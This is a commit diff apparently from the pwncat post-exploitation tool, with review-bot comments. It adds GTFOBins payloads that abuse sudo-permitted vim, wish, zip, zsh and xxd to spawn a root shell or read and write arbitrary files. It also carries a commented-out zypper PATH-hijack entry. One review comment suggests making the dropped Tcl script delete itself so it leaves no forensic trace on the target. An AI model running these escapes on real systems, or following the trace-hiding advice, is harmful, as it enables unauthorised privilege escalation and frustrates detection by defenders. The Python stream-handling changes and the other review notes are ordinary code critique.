
Added new GTFObins

This commit is contained in:
John Hammond 2020-05-23 03:06:19 -04:00
parent 76f83ea076
commit 72b83c88b2
6 changed files with 119 additions and 10 deletions


@ -874,8 +874,52 @@
//-------------------------------------------------------------------
"vim": [
{
"type": "shell",
"payload": "{command}",
"args": ["-c", "':!{shell}'", "-c", "'quit'"],
// Include an extra newline to be sure to exit vim itself.
"exit": "exit\n\n"
},
{
"type": "shell",
"payload": "{command}",
"args": ["-c", "':py import os; os.execl(\"{shell}\", \"{shell}\", \"-c\", \"reset; exec {shell}\")'", "-c", "'quit'"]
},
{
"type": "shell",
"payload": "{command}",
"args": ["-c", "':py3 import os; os.execl(\"{shell}\", \"{shell}\", \"-c\", \"reset; exec {shell}\")'", "-c", "'quit'"]
},
{
"type": "shell",
"payload": "{command}",
"args": ["-c", "':lua os.execute(\"reset; exec {shell}\")'", "-c", "'quit'"]
},
{
"type": "read",
"stream": "print",
"payload": "{command}",
"args": ["-es" ,"'+%print'" ,"'+:q!'", "{lfile}"]
},
{
"type": "write",
"stream": "print",
"payload": "{command} >/dev/null",
"args": ["-es" ,"'+%print'" ,"'+:w! {lfile}'", "'+:q!'", "/dev/stdin"]
}
// Vim can PROBABLY file write... but I have not figured that out just yet.
],
//-------------------------------------------------------------------
"wish": [
{
"type": "shell",
"payload": "TF=none; {command} -h 2>/dev/null 1>&2; TF=$({mktemp}); echo 'exec {shell} <@stdin >@stdout 2>@stderr; exit' > $TF; {command}",
"args": ["$TF"]
}
],
//-------------------------------------------------------------------
"xargs": [
{
@ -890,5 +934,56 @@
"payload": "{command}",
"args": ["-a", "{lfile}", "-0"]
}
],
//-------------------------------------------------------------------
"xxd": [
{
"type": "read",
"stream": "raw",
"payload": "{command} {lfile} | {command} -r ",
"args": []
},
// This has the same issue of not sending the right length of the file.
{
"type": "write",
"stream": "raw",
"payload": "{xxd} -l {length} | {command}",
"args": ["-r", "-", "{lfile}"]
}
],
//-------------------------------------------------------------------
// `yum` should be added.
// https://gtfobins.github.io/gtfobins/yum/
//-------------------------------------------------------------------
"zip": [
{
"type": "shell",
"payload": "TF=none; {command} --help >/dev/null; TF=$({mktemp} -u); {command} $TF /etc/hosts -T -TT '{shell} #'",
"args": []
}
],
//-------------------------------------------------------------------
"zsh": [
{
"type": "shell",
"payload": "{command}",
"args": ["-c", "\"{shell} -p\""]
}
]
//-------------------------------------------------------------------
// zsoelim was not yet tested because it might do strange things to the data
// https://gtfobins.github.io/gtfobins/zsoelim/
//
//-------------------------------------------------------------------
// zypper requires the modification of an environment variable.
// We don't handle this well in pwncat for sudo.
// https://gtfobins.github.io/gtfobins/zypper/
// "zypper": [
// {
// "type": "shell",
// "payload": "TF=none; {command} 2>/dev/null; TF=$({mktemp} -d); cp {shell} $TF/zypper-x; export PATH=$TF:$PATH; {command} x",
// "args": [],
// "exit": "exit\n"
// }
// ]
}
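Review bot: The `wish` payload writes a Tcl script that spawns the privileged shell into `$TF` and never removes it, so every use leaves a `mktemp` file on the target whose contents name the shell binary and point straight at the technique; the archive `zip` creates at its `$TF` path is left behind the same way. The Tcl script can clean up after itself before handing off, e.g. `echo 'file delete [info script]; exec {shell} <@stdin >@stdout 2>@stderr; exit' > $TF` — confirm `[info script]` resolves under `wish` as it does under `tclsh`. `mktemp -u` only reserves a name, and since `{command}` runs under sudo the later `zip` write happens as root at a path another local user could race; that is the classic `mktemp -u` caveat and worth a comment even if it is accepted for a pentest tool. The `// Vim can PROBABLY file write...` comment is now stale, since a `write` entry was added directly above it, and should be dropped. The JSON object these entries belong to opens before the first hunk, and the `zsh`/`zypper` tail in the second hunk closes it.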


@ -6,6 +6,12 @@ import socket
import sys
from sqlalchemy.exc import InvalidRequestError
import warnings
from sqlalchemy import exc as sa_exc
# Ignore SQL Alchemy warnings
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=sa_exc.SAWarning)
import pwncat
from pwncat.remote import Victim

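Review bot: `warnings.catch_warnings()` restores the previous filter state when the `with` block exits, so the `SAWarning` suppression covers only what is indented under it — with the hunk's indentation lost here that appears to be just the `import pwncat` / `from pwncat.remote import Victim` lines — and any `SAWarning` raised later at query time will still print. If the intent is to silence them for the whole program, a module-level `warnings.filterwarnings("ignore", category=sa_exc.SAWarning)` does that without the context manager; if the intent really is import-time only, the comment should say so, e.g. `# Silence SQLAlchemy warnings emitted while pwncat's models are imported`. `sqlalchemy.exc` is now imported twice (`from sqlalchemy.exc import InvalidRequestError` and `from sqlalchemy import exc as sa_exc`); one form would do. Ignoring the whole `SAWarning` category also hides the deprecation and mapping warnings a future SQLAlchemy upgrade depends on, so keep the filter as narrow as the actual noise requires.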

@ -54,6 +54,7 @@ class RemoteBinaryPipe(RawIOBase):
# output of the user's terminal
def close(self):
if self.eof:
return
@ -128,13 +129,16 @@ class RemoteBinaryPipe(RawIOBase):
pass
def write(self, data: bytes):
if self.eof:
return None
try:
n = self.pty.client.send(data)
except (socket.timeout, BlockingIOError):
n = 0
if n == 0:
return None
self.count += n
return n

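Review bot: `write` returns whatever `send` managed to push and, after a `socket.timeout`/`BlockingIOError`, reports `None` having sent nothing, so a short or refused send silently drops the rest of `data` unless every caller loops on the return value; the `BlockingIOError` handler suggests the socket is non-blocking, where partial sends are routine for anything larger than the socket buffer. Either document that contract in a docstring (`RawIOBase.write` permits it) or have `write` drive the whole buffer out itself, as below; the `continue` on a not-ready socket should ideally become a `select`-style wait rather than a spin, if the file already has such a helper. The enclosing `RemoteBinaryPipe` class header is outside the hunk.

```python
    def write(self, data: bytes):
        """Send all of ``data``; returns the byte count, or None if nothing could be sent."""
        if self.eof:
            return None
        view = memoryview(data)
        sent = 0
        while sent < len(view):
            try:
                n = self.pty.client.send(view[sent:])
            except (socket.timeout, BlockingIOError):
                # Socket not ready: retry the remainder instead of dropping it.
                continue
            if n == 0:
                break
            sent += n
        self.count += sent
        return sent or None
```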

@ -3,7 +3,7 @@ from typing import Type, List, Tuple, Optional
from prompt_toolkit.shortcuts import confirm
from colorama import Fore
import crypt
from time import sleep
import time
import socket
from pprint import pprint
import re
@ -278,9 +278,10 @@ class Finder:
try:
# Attempt our basic, known technique
exit_script = technique.method.execute(technique)
pwncat.victim.flush_output()
pwncat.victim.flush_output(some=True)
# Reset the terminal to ensure we are stable
time.sleep(0.1)
pwncat.victim.reset()
# Check that we actually succeeded

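Review bot: The bare `time.sleep(0.1)` before `pwncat.victim.reset()` is a fixed timing guess: on a slow link the technique's output can still be in flight when the sleep ends, so `reset()` and the success check that follows operate on partial output, while on a fast link it is 100 ms of wasted latency per technique tried. If `flush_output(some=True)` already blocks until something has arrived, the sleep may be redundant; otherwise a bounded poll that waits for the channel to go quiet would be more robust than a constant. At minimum the reason for the delay belongs in the comment, e.g. `# Give the remote shell a moment to finish echoing before the terminal is reset`. The enclosing `try` in `Finder` opens before the hunk and the success check continues after it.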

@ -2,7 +2,7 @@
from typing import Generator, List, BinaryIO
import shlex
import sys
from time import sleep
import time
import os
from colorama import Fore, Style
import socket
@ -254,6 +254,8 @@ class SudoMethod(Method):
method, sudo_spec, need_password = technique.ident
# Build the payload
# The data size is WRONG for encoded payloads!!!
# ... but I guess this not applicable for `raw` streams..?
payload, input_data, exit_command = method.build(
lfile=filepath, spec=sudo_spec, user=technique.user, length=len(data)
)
@ -270,12 +272,11 @@ class SudoMethod(Method):
exit_cmd=exit_command.encode("utf-8"),
)
# Send the input data required to initiate the transfer
if len(input_data) > 0:
pipe.write(input_data.encode("utf-8"))
with method.wrap_stream(pipe) as pipe:
# Send the input data required to initiate the transfer
if len(input_data) > 0:
pipe.write(input_data.encode("utf-8"))
pipe.write(data)
def get_name(self, tech: Technique):

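Review bot: `input_data` is now written through the stream returned by `method.wrap_stream(pipe)` instead of the raw `pipe`; if that wrapper transforms bytes (encoding the payload is what the new `# The data size is WRONG for encoded payloads!!!` comment hints at), the initiation string reaches the remote command transformed as well, so confirm that is intended and otherwise keep `pipe.write(input_data.encode("utf-8"))` before entering the `with`. Separately, `length=len(data)` at the `method.build` call is the raw byte count, but a payload that consumes a fixed number of bytes (the `xxd -l {length}` entry in the GTFOBins file, for one) needs the size of the encoded stream, and the two added comments acknowledge this rather than resolve it — a truncated or trailing-garbage write is the likely result. Having `wrap_stream` expose the encoded length, or passing it into `build`, would answer the `# ... but I guess this not applicable for raw streams..?` question in code rather than leaving it as a comment. Rebinding the wrapper as `pipe` also hides the raw pipe for the rest of the method. The enclosing method starts before the hunk and continues after it.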

@ -1328,6 +1328,8 @@ class Victim:
output = b""
old_timeout = self.client.gettimeout()
self.client.settimeout(0)
# self.client.send(b"echo\n")
# some = True
while True:
try: